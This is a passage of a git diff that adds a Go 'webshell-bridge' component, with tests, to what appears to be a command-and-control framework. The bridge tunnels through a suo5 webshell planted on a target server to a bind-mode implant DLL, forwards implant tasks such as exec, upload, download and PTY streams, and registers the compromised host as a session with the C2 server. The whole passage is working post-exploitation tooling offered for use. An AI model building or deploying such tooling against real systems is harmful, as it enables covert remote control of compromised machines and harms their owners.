streamChanBuffer = 16 +) + +// Channel manages the malefic protocol connection to the bind DLL on the target. +// The bridge binary acts as a client, the DLL acts as a malefic bind server. +// Communication tunnels through suo5: transport.Dial -> suo5 HTTP -> target localhost. +// +// Streaming task support: OpenStream registers a per-taskID response channel +// that persists across multiple DLL responses. recvLoop dispatches incoming +// packets to the correct channel without removing it, enabling PTY, bridge-agent, +// and other streaming modules. CloseStream or CloseAllStreams handles cleanup. +type Channel struct { + conn net.Conn + transport dialTransport + dllAddr string + + sessionID uint32 // malefic session ID from DLL's first frame + parser *malefic.MaleficParser + + writeMu sync.Mutex // serializes writes to conn + pending map[uint32]chan *implantpb.Spite // taskID -> response channel + pendMu sync.Mutex // guards pending map + closed bool + closeMu sync.Mutex + recvDone chan struct{} // closed when recvLoop exits + recvErr error // terminal error from recvLoop +} + +type dialTransport interface { + DialContext(ctx context.Context, network, address string) (net.Conn, error) +} + +// NewChannel creates a channel that will connect through the given transport +// to the DLL's malefic bind server at dllAddr (e.g. "127.0.0.1:13338"). +func NewChannel(transport dialTransport, dllAddr, pipelineName string) *Channel { + return &Channel{ + transport: transport, + dllAddr: dllAddr, + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } +} + +// Connect dials the DLL through suo5. No handshake is performed here; +// malefic bind sends the Register frame immediately after TCP connect. +func (c *Channel) Connect(ctx context.Context) error { + dialCtx, cancel := context.WithTimeout(ctx, connectTimeout) + defer cancel() + + conn, err := c.transport.DialContext(dialCtx, "tcp", c.dllAddr) + if err != nil { + if dialCtx.Err() != nil { + return fmt.Errorf("connect timeout: %w", dialCtx.Err()) + } + return fmt.Errorf("dial DLL at %s: %w", c.dllAddr, err) + } + c.conn = conn + return nil +} + +// Handshake reads the initial registration data from the DLL. +// The malefic bind DLL sends a frame containing Spites{[Spite{Body: Register{...}}]} +// immediately after TCP connect. +func (c *Channel) Handshake() (*implantpb.Register, error) { + sid, length, err := c.parser.ReadHeader(c.conn) + if err != nil { + return nil, fmt.Errorf("read handshake header: %w", err) + } + + buf := make([]byte, length) + if _, err := io.ReadFull(c.conn, buf); err != nil { + return nil, fmt.Errorf("read handshake payload: %w", err) + } + + spites, err := c.parser.Parse(buf) + if err != nil { + return nil, fmt.Errorf("parse handshake: %w", err) + } + + if len(spites.GetSpites()) == 0 { + return nil, fmt.Errorf("empty handshake frame") + } + + spite := spites.GetSpites()[0] + reg := spite.GetRegister() + if reg == nil { + return nil, fmt.Errorf("handshake spite has no Register body") + } + + c.sessionID = sid + logs.Log.Debugf("handshake received: sid=%d name=%s modules=%v", sid, reg.Name, reg.Module) + return reg, nil +} + +// StartRecvLoop starts a background goroutine that reads responses from the +// DLL and dispatches them to the appropriate pending channel by taskID. +// Unlike the old single-response model, channels are NOT removed on first +// dispatch — they persist until explicitly closed via CloseStream. +// Must be called after Connect + Handshake. +func (c *Channel) StartRecvLoop() { + go c.recvLoop() +} + +func (c *Channel) recvLoop() { + defer close(c.recvDone) + for { + _, length, err := c.parser.ReadHeader(c.conn) + if err != nil { + c.handleRecvLoopExit(err) + return + } + + buf := make([]byte, length) + if _, err := io.ReadFull(c.conn, buf); err != nil { + c.handleRecvLoopExit(fmt.Errorf("read payload: %w", err)) + return + } + + spites, err := c.parser.Parse(buf) + if err != nil { + logs.Log.Debugf("recv loop parse error (skipping frame): %v", err) + continue + } + + // Dispatch each Spite by its TaskId — do NOT delete the channel entry. + for _, spite := range spites.GetSpites() { + taskID := spite.GetTaskId() + c.pendMu.Lock() + ch, ok := c.pending[taskID] + c.pendMu.Unlock() + + if ok { + select { + case ch <- spite: + default: + logs.Log.Debugf("recv loop: channel full for task %d, dropping", taskID) + } + } else { + logs.Log.Debugf("recv loop: no waiter for task %d", taskID) + } + } + } +} + +func (c *Channel) handleRecvLoopExit(err error) { + c.closeMu.Lock() + closed := c.closed + c.closeMu.Unlock() + if !closed { + logs.Log.Debugf("recv loop error: %v", err) + } + // Close all pending channels to signal EOF to waiters. + c.pendMu.Lock() + c.recvErr = err + for id, ch := range c.pending { + close(ch) + delete(c.pending, id) + } + c.pendMu.Unlock() +} + +// OpenStream registers a buffered response channel for taskID and returns the read end. +// The channel receives all DLL responses for this taskID until CloseStream is called +// or the recvLoop exits (which closes the channel). +func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { + ch := make(chan *implantpb.Spite, streamChanBuffer) + c.pendMu.Lock() + c.pending[taskID] = ch + c.pendMu.Unlock() + return ch +} + +// SendSpite sends a single spite to the DLL for the given taskID. +// Thread-safe: multiple goroutines can call SendSpite concurrently. +func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { + c.closeMu.Lock() + if c.closed || c.conn == nil { + c.closeMu.Unlock() + return fmt.Errorf("channel closed") + } + c.closeMu.Unlock() + + spite.TaskId = taskID + spites := &implantpb.Spites{Spites: []*implantpb.Spite{spite}} + + data, err := c.parser.Marshal(spites, c.sessionID) + if err != nil { + return fmt.Errorf("marshal spite: %w", err) + } + + c.writeMu.Lock() + _, err = c.conn.Write(data) + c.writeMu.Unlock() + return err +} + +// CloseStream removes the pending channel for taskID. +// Does NOT close the channel itself to avoid send-on-closed-channel panic +// if recvLoop is concurrently dispatching. +func (c *Channel) CloseStream(taskID uint32) { + c.pendMu.Lock() + delete(c.pending, taskID) + c.pendMu.Unlock() +} + +// CloseAllStreams closes and removes all pending channels. +// Safe to call during teardown (holds pendMu for the entire operation). +func (c *Channel) CloseAllStreams() { + c.pendMu.Lock() + for id, ch := range c.pending { + close(ch) + delete(c.pending, id) + } + c.pendMu.Unlock() +} + +// Forward sends a Spite request to the DLL and waits for a single response. +// Convenience wrapper over OpenStream + SendSpite + CloseStream for unary tasks. +func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { + ch := c.OpenStream(taskID) + + if err := c.SendSpite(taskID, spite); err != nil { + c.CloseStream(taskID) + return nil, err + } + + resp, ok := <-ch + c.CloseStream(taskID) + if !ok { + return nil, fmt.Errorf("channel closed during forward") + } + return resp, nil +} + +// WithSecure enables Age encryption/decryption on the malefic wire protocol. +func (c *Channel) WithSecure(keyPair *clientpb.KeyPair) { + c.parser.WithSecure(keyPair) +} + +// Close shuts down the malefic connection. +func (c *Channel) Close() error { + c.closeMu.Lock() + defer c.closeMu.Unlock() + + if c.closed { + return nil + } + c.closed = true + if c.conn != nil { + return c.conn.Close() + } + return nil +} diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go new file mode 100644 index 00000000..46635264 --- /dev/null +++ b/server/cmd/webshell-bridge/channel_test.go @@ -0,0 +1,541 @@ +package main + +import ( + "bytes" + "encoding/binary" + "io" + "net" + "sync" + "testing" + "time" + + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/malice-network/helper/utils/compress" + malefic "github.com/chainreactors/malice-network/server/internal/parser/malefic" + "github.com/gookit/config/v2" + "google.golang.org/protobuf/proto" +) + +func init() { + // Initialize config for the malefic parser's packet length check. + config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) +} + +// testWriteMaleficFrame writes a malefic-framed message to conn for test use. +func testWriteMaleficFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { + data, err := proto.Marshal(spites) + if err != nil { + return err + } + data, err = compress.Compress(data) + if err != nil { + return err + } + var buf bytes.Buffer + buf.WriteByte(malefic.DefaultStartDelimiter) + binary.Write(&buf, binary.LittleEndian, sid) + binary.Write(&buf, binary.LittleEndian, int32(len(data))) + buf.Write(data) + buf.WriteByte(malefic.DefaultEndDelimiter) + _, err = conn.Write(buf.Bytes()) + return err +} + +// testReadMaleficFrame reads a malefic-framed message from conn for test use. +func testReadMaleficFrame(conn net.Conn) (uint32, *implantpb.Spites, error) { + header := make([]byte, malefic.HeaderLength) + if _, err := io.ReadFull(conn, header); err != nil { + return 0, nil, err + } + if header[0] != malefic.DefaultStartDelimiter { + return 0, nil, io.ErrUnexpectedEOF + } + sid := binary.LittleEndian.Uint32(header[1:5]) + length := binary.LittleEndian.Uint32(header[5:9]) + buf := make([]byte, length+1) + if _, err := io.ReadFull(conn, buf); err != nil { + return 0, nil, err + } + payload := buf[:length] + decompressed, err := compress.Decompress(payload) + if err != nil { + decompressed = payload + } + spites := &implantpb.Spites{} + if err := proto.Unmarshal(decompressed, spites); err != nil { + return 0, nil, err + } + return sid, spites, nil +} + +// mockMaleficDLL simulates a malefic bind DLL. +// It accepts one connection, sends a Register handshake frame, +// then echoes Spite requests back with a modified Name field. +type mockMaleficDLL struct { + ln net.Listener + register *implantpb.Register + sessionID uint32 +} + +func newMockMaleficDLL(t *testing.T) *mockMaleficDLL { + t.Helper() + ln, err := net.Listen("tcp", "127.0.0.1:0") + if err != nil { + t.Fatalf("mock DLL listen: %v", err) + } + return &mockMaleficDLL{ + ln: ln, + sessionID: 42, + register: &implantpb.Register{ + Name: "test-dll", + Module: []string{"exec", "upload", "download"}, + Sysinfo: &implantpb.SysInfo{ + Os: &implantpb.Os{ + Name: "Windows", + }, + }, + }, + } +} + +func (m *mockMaleficDLL) addr() string { + return m.ln.Addr().String() +} + +func (m *mockMaleficDLL) close() { + m.ln.Close() +} + +// serve handles one client connection through the full malefic protocol. +func (m *mockMaleficDLL) serve(t *testing.T, handleN int) { + t.Helper() + conn, err := m.ln.Accept() + if err != nil { + t.Errorf("mock DLL accept: %v", err) + return + } + defer conn.Close() + + // Send Register handshake as malefic frame + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + { + Body: &implantpb.Spite_Register{Register: m.register}, + }, + }, + } + if err := testWriteMaleficFrame(conn, regSpite, m.sessionID); err != nil { + t.Errorf("mock DLL send handshake: %v", err) + return + } + + // Echo Spite requests back with modified Name + for i := 0; i < handleN; i++ { + sid, spites, err := testReadMaleficFrame(conn) + if err != nil { + t.Errorf("mock DLL read spite: %v", err) + return + } + + respSpites := &implantpb.Spites{} + for _, spite := range spites.GetSpites() { + respSpites.Spites = append(respSpites.Spites, &implantpb.Spite{ + Name: "resp:" + spite.Name, + TaskId: spite.TaskId, + }) + } + if err := testWriteMaleficFrame(conn, respSpites, sid); err != nil { + t.Errorf("mock DLL send response: %v", err) + return + } + } +} + +// dialMockDLL connects to the mock DLL and returns a Channel ready for Handshake/Forward. +func dialMockDLL(t *testing.T, addr string) *Channel { + t.Helper() + conn, err := net.DialTimeout("tcp", addr, 5*time.Second) + if err != nil { + t.Fatalf("dial mock DLL: %v", err) + } + return &Channel{ + conn: conn, + dllAddr: addr, + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } +} + +func TestChannelConnect(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + // Accept the connection in background + accepted := make(chan struct{}) + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + conn.Close() + close(accepted) + }() + + conn, err := net.DialTimeout("tcp", mock.addr(), 5*time.Second) + if err != nil { + t.Fatalf("dial: %v", err) + } + conn.Close() + + select { + case <-accepted: + case <-time.After(time.Second): + t.Fatal("connection not accepted") + } +} + +func TestChannelHandshake(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 0) // Handshake only + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + reg, err := ch.Handshake() + if err != nil { + t.Fatalf("handshake: %v", err) + } + + if reg.Name != "test-dll" { + t.Errorf("expected name 'test-dll', got %q", reg.Name) + } + if len(reg.Module) != 3 { + t.Errorf("expected 3 modules, got %d", len(reg.Module)) + } + if reg.Sysinfo == nil || reg.Sysinfo.Os == nil || reg.Sysinfo.Os.Name != "Windows" { + t.Errorf("expected Windows sysinfo, got %+v", reg.Sysinfo) + } + if ch.sessionID != 42 { + t.Errorf("expected sessionID 42, got %d", ch.sessionID) + } +} + +func TestChannelForward(t *testing.T) { + mock := newMockMaleficDLL(t) + defer mock.close() + + go mock.serve(t, 2) // Handshake + 2 Spite roundtrips + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + ch.StartRecvLoop() + + // Forward Spite #1 + resp1, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) + if err != nil { + t.Fatalf("forward #1: %v", err) + } + if resp1.Name != "resp:exec" { + t.Errorf("expected 'resp:exec', got %q", resp1.Name) + } + + // Forward Spite #2 + resp2, err := ch.Forward(2, &implantpb.Spite{Name: "upload"}) + if err != nil { + t.Fatalf("forward #2: %v", err) + } + if resp2.Name != "resp:upload" { + t.Errorf("expected 'resp:upload', got %q", resp2.Name) + } +} + +func TestChannelForwardBatch(t *testing.T) { + // Test that recvLoop correctly dispatches a batch response + // (one malefic frame containing multiple Spites). + mock := newMockMaleficDLL(t) + defer mock.close() + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Send handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read two individual requests + var requests []*implantpb.Spite + for i := 0; i < 2; i++ { + _, spites, err := testReadMaleficFrame(conn) + if err != nil { + return + } + requests = append(requests, spites.GetSpites()...) + } + + // Respond with a single batch frame containing both responses + batchResp := &implantpb.Spites{} + for _, req := range requests { + batchResp.Spites = append(batchResp.Spites, &implantpb.Spite{ + Name: "resp:" + req.Name, + TaskId: req.TaskId, + }) + } + testWriteMaleficFrame(conn, batchResp, mock.sessionID) + }() + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + ch.StartRecvLoop() + + // Send two requests concurrently + var wg sync.WaitGroup + results := make(map[uint32]string) + var mu sync.Mutex + + for _, tc := range []struct { + id uint32 + name string + }{ + {10, "exec"}, + {20, "download"}, + } { + wg.Add(1) + go func(id uint32, name string) { + defer wg.Done() + resp, err := ch.Forward(id, &implantpb.Spite{Name: name}) + if err != nil { + t.Errorf("forward %d: %v", id, err) + return + } + mu.Lock() + results[id] = resp.Name + mu.Unlock() + }(tc.id, tc.name) + } + + wg.Wait() + + if results[10] != "resp:exec" { + t.Errorf("task 10: expected 'resp:exec', got %q", results[10]) + } + if results[20] != "resp:download" { + t.Errorf("task 20: expected 'resp:download', got %q", results[20]) + } +} + +func TestChannelStreamMultipleResponses(t *testing.T) { + // Test that OpenStream receives multiple responses for the same taskID + // without the channel being removed after the first one. + mock := newMockMaleficDLL(t) + defer mock.close() + + const taskID uint32 = 100 + const numResponses = 3 + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Send handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read the initial request + testReadMaleficFrame(conn) + + // Send multiple responses for the same taskID in separate frames + for i := 0; i < numResponses; i++ { + resp := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + { + Name: "chunk:" + string(rune('A'+i)), + TaskId: taskID, + }, + }, + } + if err := testWriteMaleficFrame(conn, resp, mock.sessionID); err != nil { + return + } + } + }() + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + // Open a persistent stream for this task + respCh := ch.OpenStream(taskID) + ch.StartRecvLoop() + + // Send the initial request + if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "start-stream"}); err != nil { + t.Fatalf("send spite: %v", err) + } + + // Collect all responses + var received []string + for i := 0; i < numResponses; i++ { + select { + case spite, ok := <-respCh: + if !ok { + t.Fatalf("channel closed after %d responses", i) + } + received = append(received, spite.Name) + case <-time.After(2 * time.Second): + t.Fatalf("timeout waiting for response %d", i) + } + } + + if len(received) != numResponses { + t.Fatalf("expected %d responses, got %d", numResponses, len(received)) + } + for i, name := range received { + expected := "chunk:" + string(rune('A'+i)) + if name != expected { + t.Errorf("response %d: expected %q, got %q", i, expected, name) + } + } + + ch.CloseStream(taskID) +} + +func TestChannelCloseStream(t *testing.T) { + // Verify that CloseStream removes the channel so subsequent dispatches + // are dropped (logged as "no waiter"). + mock := newMockMaleficDLL(t) + defer mock.close() + + const taskID uint32 = 200 + + go func() { + conn, err := mock.ln.Accept() + if err != nil { + return + } + defer conn.Close() + + // Handshake + regSpite := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Body: &implantpb.Spite_Register{Register: mock.register}}, + }, + } + testWriteMaleficFrame(conn, regSpite, mock.sessionID) + + // Read initial request + testReadMaleficFrame(conn) + + // Send first response + testWriteMaleficFrame(conn, &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "first", TaskId: taskID}}, + }, mock.sessionID) + + // Small delay for CloseStream to execute + time.Sleep(100 * time.Millisecond) + + // Send second response (should be dropped after CloseStream) + testWriteMaleficFrame(conn, &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "second", TaskId: taskID}}, + }, mock.sessionID) + }() + + ch := dialMockDLL(t, mock.addr()) + defer ch.Close() + + if _, err := ch.Handshake(); err != nil { + t.Fatalf("handshake: %v", err) + } + + respCh := ch.OpenStream(taskID) + ch.StartRecvLoop() + + if err := ch.SendSpite(taskID, &implantpb.Spite{Name: "req"}); err != nil { + t.Fatalf("send: %v", err) + } + + // Receive first response + select { + case spite := <-respCh: + if spite.Name != "first" { + t.Errorf("expected 'first', got %q", spite.Name) + } + case <-time.After(2 * time.Second): + t.Fatal("timeout waiting for first response") + } + + // Close the stream + ch.CloseStream(taskID) + + // Second response should be dropped — the channel should not receive it. + // Wait briefly to let the mock DLL send it. + time.Sleep(200 * time.Millisecond) + + select { + case _, ok := <-respCh: + if ok { + t.Error("received unexpected response after CloseStream") + } + default: + // Expected: nothing in channel + } +} + +func TestChannelCloseIdempotent(t *testing.T) { + ch := &Channel{ + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } + + if err := ch.Close(); err != nil { + t.Fatalf("close without conn: %v", err) + } + if err := ch.Close(); err != nil { + t.Fatalf("double close: %v", err) + } +} + +func TestChannelForwardAfterClose(t *testing.T) { + ch := &Channel{ + closed: true, + pending: make(map[uint32]chan *implantpb.Spite), + recvDone: make(chan struct{}), + parser: malefic.NewMaleficParser(), + } + + _, err := ch.Forward(1, &implantpb.Spite{Name: "exec"}) + if err == nil { + t.Fatal("expected error forwarding on closed channel") + } +} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go new file mode 100644 index 00000000..800a9d43 --- /dev/null +++ b/server/cmd/webshell-bridge/config.go @@ -0,0 +1,13 @@ +package main + +// Config holds the bridge configuration. +type Config struct { + AuthFile string // path to listener.auth mTLS certificate + ServerAddr string // optional server address override + ListenerName string // listener name for registration + ListenerIP string // listener external IP + PipelineName string // pipeline name + Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) + DLLAddr string // target-side malefic bind DLL address (e.g. 127.0.0.1:13338) + Debug bool // enable debug logging +} diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go new file mode 100644 index 00000000..443aa74f --- /dev/null +++ b/server/cmd/webshell-bridge/main.go @@ -0,0 +1,67 @@ +package main + +import ( + "context" + "flag" + "fmt" + "os" + "os/signal" + "syscall" + + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/logs" + "github.com/gookit/config/v2" +) + +func main() { + cfg := &Config{} + flag.StringVar(&cfg.AuthFile, "auth", "", "path to listener.auth mTLS certificate file") + flag.StringVar(&cfg.ServerAddr, "server", "", "server address (overrides auth file)") + flag.StringVar(&cfg.ListenerName, "listener", "webshell-listener", "listener name") + flag.StringVar(&cfg.ListenerIP, "ip", "127.0.0.1", "listener external IP") + flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") + flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. suo5://target/suo5.jsp)") + flag.StringVar(&cfg.DLLAddr, "dll-addr", "127.0.0.1:13338", "target-side malefic bind DLL address") + flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") + flag.Parse() + + if cfg.AuthFile == "" || cfg.Suo5URL == "" { + fmt.Fprintf(os.Stderr, "Usage: webshell-bridge --auth --suo5 \n") + flag.PrintDefaults() + os.Exit(1) + } + + if cfg.PipelineName == "" { + cfg.PipelineName = fmt.Sprintf("webshell_%s", cfg.ListenerName) + } + + if cfg.Debug { + logs.Log.SetLevel(logs.DebugLevel) + } + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + + // Handle graceful shutdown + sigCh := make(chan os.Signal, 1) + signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) + go func() { + <-sigCh + logs.Log.Important("shutting down...") + cancel() + }() + + // Initialize packet length config for the malefic parser. + config.Set(consts.ConfigMaxPacketLength, 10*1024*1024) + + bridge, err := NewBridge(cfg) + if err != nil { + logs.Log.Errorf("failed to create bridge: %v", err) + os.Exit(1) + } + + if err := bridge.Start(ctx); err != nil { + logs.Log.Errorf("bridge exited with error: %v", err) + os.Exit(1) + } +} diff --git a/server/cmd/webshell-bridge/main_test.go b/server/cmd/webshell-bridge/main_test.go new file mode 100644 index 00000000..83667a42 --- /dev/null +++ b/server/cmd/webshell-bridge/main_test.go @@ -0,0 +1,15 @@ +package main + +import ( + "io" + "os" + "testing" + + "github.com/chainreactors/logs" +) + +func TestMain(m *testing.M) { + logs.Log = logs.NewLogger(logs.WarnLevel) + logs.Log.SetOutput(io.Discard) + os.Exit(m.Run()) +} diff --git a/server/cmd/webshell-bridge/session.go b/server/cmd/webshell-bridge/session.go new file mode 100644 index 00000000..2bd4cd4e --- /dev/null +++ b/server/cmd/webshell-bridge/session.go @@ -0,0 +1,118 @@ +package main + +import ( + "context" + "fmt" + "time" + + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/proto/services/listenerrpc" + "github.com/chainreactors/logs" +) + +// Session represents a single implant session managed by the bridge. +// Each session owns a Channel that communicates with the malefic bind DLL +// on the target through the malefic protocol over suo5. +type Session struct { + ID string + PipelineID string + ListenerID string + + channel *Channel +} + +// NewSession reads the malefic handshake from the DLL (SysInfo + Modules) +// and registers the session with the server. +func NewSession( + rpc listenerrpc.ListenerRPCClient, + ctx context.Context, + id, pipelineID, listenerID string, + channel *Channel, +) (*Session, error) { + // Read registration data from DLL via malefic handshake + reg, err := channel.Handshake() + if err != nil { + return nil, fmt.Errorf("handshake: %w", err) + } + + sess := &Session{ + ID: id, + PipelineID: pipelineID, + ListenerID: listenerID, + channel: channel, + } + + // Use real data from the DLL + if reg.Name == "" { + reg.Name = fmt.Sprintf("webshell-%s", id[:8]) + } + + _, err = rpc.Register(ctx, &clientpb.RegisterSession{ + SessionId: id, + PipelineId: pipelineID, + ListenerId: listenerID, + RawId: channel.sessionID, + RegisterData: reg, + Target: fmt.Sprintf("webshell://%s", id), + }) + if err != nil { + return nil, fmt.Errorf("register session: %w", err) + } + + logs.Log.Importantf("session registered: %s (name=%s, modules=%d, sid=%d)", id, reg.Name, len(reg.Module), channel.sessionID) + return sess, nil +} + +// HandleUnary forwards a Spite request through the malefic channel to the +// bind DLL and returns a single response. Use for non-streaming tasks. +func (s *Session) HandleUnary(taskID uint32, req *implantpb.Spite) (*implantpb.Spite, error) { + return s.channel.Forward(taskID, req) +} + +// OpenTaskStream registers a persistent response channel for a streaming task. +// Returns a channel that receives all DLL responses for this taskID. +func (s *Session) OpenTaskStream(taskID uint32) <-chan *implantpb.Spite { + return s.channel.OpenStream(taskID) +} + +// SendTaskSpite sends a spite to the DLL for a task (streaming or initial request). +func (s *Session) SendTaskSpite(taskID uint32, spite *implantpb.Spite) error { + return s.channel.SendSpite(taskID, spite) +} + +// CloseTaskStream cleans up a streaming task's response channel. +func (s *Session) CloseTaskStream(taskID uint32) { + s.channel.CloseStream(taskID) +} + +// Checkin sends a heartbeat for this session. +func (s *Session) Checkin(rpc listenerrpc.ListenerRPCClient, ctx context.Context) { + _, err := rpc.Checkin(ctx, &implantpb.Ping{ + Nonce: int32(time.Now().Unix() & 0x7FFFFFFF), + }) + if err != nil { + logs.Log.Debugf("checkin failed for %s: %v", s.ID, err) + } +} + +// Close shuts down the session's malefic channel. +// The server will mark the session dead when checkins stop. +func (s *Session) Close() error { + logs.Log.Importantf("session %s closing (server will mark dead after checkin timeout)", s.ID) + if s.channel != nil { + s.channel.CloseAllStreams() + return s.channel.Close() + } + return nil +} + +// Alive returns true if the underlying malefic channel is still connected. +func (s *Session) Alive() bool { + if s.channel == nil { + return false + } + s.channel.closeMu.Lock() + defer s.channel.closeMu.Unlock() + return !s.channel.closed +} diff --git a/server/cmd/webshell-bridge/transport.go b/server/cmd/webshell-bridge/transport.go new file mode 100644 index 00000000..91783d78 --- /dev/null +++ b/server/cmd/webshell-bridge/transport.go @@ -0,0 +1,131 @@ +package main + +import ( + "context" + "fmt" + "net" + "net/url" + "sync" + "time" + + proxysuo5 "github.com/chainreactors/proxyclient/suo5" + suo5core "github.com/zema1/suo5/suo5" +) + +// Transport manages the suo5 tunnel connection to the target webshell. +type Transport struct { + rawURL *url.URL + mu sync.Mutex + client *proxysuo5.Suo5Client +} + +// NewTransport creates a transport adapter for the given suo5 URL. +// Supported schemes: suo5:// (HTTP), suo5s:// (HTTPS). +func NewTransport(rawURL string) (*Transport, error) { + u, err := url.Parse(rawURL) + if err != nil { + return nil, fmt.Errorf("parse suo5 URL: %w", err) + } + if u.Scheme != "suo5" && u.Scheme != "suo5s" { + return nil, fmt.Errorf("unsupported suo5 scheme: %s", u.Scheme) + } + if u.Host == "" { + return nil, fmt.Errorf("missing suo5 host") + } + + return &Transport{ + rawURL: u, + }, nil +} + +// Dial establishes a TCP connection through the suo5 tunnel to the given address. +// The returned net.Conn transparently tunnels through the webshell's HTTP channel. +func (t *Transport) Dial(network, address string) (net.Conn, error) { + return t.DialContext(context.Background(), network, address) +} + +// DialContext establishes a TCP connection through the suo5 tunnel and binds +// the initial HTTP request to ctx so cancellation interrupts the dial. +func (t *Transport) DialContext(ctx context.Context, network, address string) (net.Conn, error) { + if err := t.initClient(); err != nil { + return nil, err + } + if ctx == nil { + ctx = context.Background() + } + switch network { + case "", "tcp", "tcp4", "tcp6": + default: + return nil, fmt.Errorf("unsupported network: %s", network) + } + + conn := &suo5NetConn{ + Suo5Conn: suo5core.NewSuo5Conn(ctx, t.client.Conf.Suo5Client), + } + if err := conn.Connect(address); err != nil { + return nil, err + } + return conn, nil +} + +func (t *Transport) initClient() error { + t.mu.Lock() + defer t.mu.Unlock() + + if t.client != nil { + return nil + } + if t.rawURL == nil { + return fmt.Errorf("missing suo5 URL") + } + + conf, err := proxysuo5.NewConfFromURL(t.rawURL) + if err != nil { + return fmt.Errorf("init suo5 config: %w", err) + } + t.client = &proxysuo5.Suo5Client{ + Proxy: t.rawURL, + Conf: conf, + } + return nil +} + +type suo5NetConn struct { + *suo5core.Suo5Conn + remoteAddr string +} + +// Write normalizes the return value from the underlying suo5 chunked writer. +// In half-duplex mode the underlying Write wraps data in a frame and returns +// the frame length rather than the original data length. Callers (e.g. +// cio.WriteMsg) expect n == len(p) on success, so we fix it here. +func (conn *suo5NetConn) Write(p []byte) (int, error) { + n, err := conn.Suo5Conn.Write(p) + if err != nil { + return n, err + } + if n > len(p) { + n = len(p) + } + return n, nil +} + +func (conn *suo5NetConn) LocalAddr() net.Addr { + return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1)} +} + +func (conn *suo5NetConn) RemoteAddr() net.Addr { + return &net.TCPAddr{IP: net.IPv4(127, 0, 0, 1), Port: 0} +} + +func (conn *suo5NetConn) SetDeadline(_ time.Time) error { + return nil +} + +func (conn *suo5NetConn) SetReadDeadline(_ time.Time) error { + return nil +} + +func (conn *suo5NetConn) SetWriteDeadline(_ time.Time) error { + return nil +} diff --git a/server/cmd/webshell-bridge/transport_test.go b/server/cmd/webshell-bridge/transport_test.go new file mode 100644 index 00000000..17004a56 --- /dev/null +++ b/server/cmd/webshell-bridge/transport_test.go @@ -0,0 +1,58 @@ +package main + +import ( + "testing" +) + +func TestNewTransportValidURL(t *testing.T) { + tests := []struct { + name string + url string + }{ + {"suo5 HTTP", "suo5://target.com/suo5.jsp"}, + {"suo5 HTTPS", "suo5s://target.com/suo5.jsp"}, + {"suo5 with port", "suo5://target.com:8080/suo5.jsp"}, + {"suo5 with path", "suo5://10.0.0.1/app/suo5.aspx"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + tr, err := NewTransport(tt.url) + if err != nil { + t.Fatalf("NewTransport(%q) error: %v", tt.url, err) + } + if tr.rawURL == nil { + t.Fatal("rawURL is nil") + } + if tr.rawURL.Scheme == "" { + t.Fatal("rawURL scheme is empty") + } + if tr.rawURL.Host == "" { + t.Fatal("rawURL host is empty") + } + if tr.client != nil { + t.Fatal("client should be initialized lazily") + } + }) + } +} + +func TestNewTransportInvalidURL(t *testing.T) { + tests := []struct { + name string + url string + }{ + {"empty", ""}, + {"no scheme", "target.com/suo5.jsp"}, + {"bad scheme", "://target.com"}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + _, err := NewTransport(tt.url) + if err == nil { + t.Fatalf("NewTransport(%q) expected error, got nil", tt.url) + } + }) + } +} From 046d21ecfe692c0bb6df65f0790cca4a3538865b 